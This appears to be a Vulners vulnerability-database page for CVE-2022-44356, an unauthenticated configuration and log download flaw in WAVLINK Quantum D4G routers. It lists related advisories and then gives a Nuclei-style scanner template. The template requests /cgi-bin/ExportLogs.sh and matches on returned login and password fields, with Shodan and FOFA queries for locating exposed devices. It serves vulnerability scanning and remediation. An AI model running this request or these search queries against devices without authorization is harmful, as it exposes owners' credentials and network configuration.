| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2022-44356 | 29 Nov 202220:28 | – | circl | |
| WAVLINK WN531G3 安全漏洞 | 29 Nov 202200:00 | – | cnnvd | |
| WAVLINK WN531G3 Access Control Error Vulnerability | 30 Nov 202200:00 | – | cnvd | |
| CVE-2022-44356 | 29 Nov 202200:00 | – | cve | |
| CVE-2022-44356 | 29 Nov 202200:00 | – | cvelist | |
| CVE-2022-44356 | 29 Nov 202217:15 | – | nvd | |
| Design/Logic Flaw | 29 Nov 202217:15 | – | prion | |
| PT-2022-27192 · Wavlink · Wavlink Quantum D4G | 29 Nov 202200:00 | – | ptsecurity | |
| CVE-2022-44356 | 23 May 202500:06 | – | redhatcve | |
| CVE-2022-44356 | 29 Nov 202200:00 | – | vulnrichment |
id: CVE-2022-44356
info:
name: WAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure
author: ritikchaddha
severity: high
description: |
WAVLINK Quantum D4G (WL-WN531G3) running firmware versions M31G3.V5030.201204 and M31G3.V5030.200325 has an access control issue which allows unauthenticated attackers to download configuration data and log files.
remediation: |
Apply the latest firmware updates from Wavlink or implement network segmentation to restrict access to the device administration interface.
impact: |
Successful exploitation could lead to sensitive information disclosure.
reference:
- https://github.com/strik3r0x1/Vulns/blob/main/Wavlink%20WL-WN531G3.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-44356
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-44356
epss-score: 0.02756
epss-percentile: 0.84473
cpe: cpe:2.3:o:wavlink:wl-wn531g3_firmware:m31g3.v5030.200325:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: wavlink
product: wl-wn531g3_firmware
shodan-query: html:"WN531G3"
fofa-query: body="WN531G3"
tags: cve,cve2022,wavlink,exposure,wn531g3,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(body, "WN531G3")'
internal: true
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportLogs.sh"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")'
- 'contains_all(header, "application/octet-stream", "filename=\"")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100ac0c8dccc400bec0ab84dbd8198e9406a6302c7f1da71609bbf1561d71cab3c0022072b1cbb5fcf443a03440ab094a09e5addf903e928fc81f860952cb6314704196:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation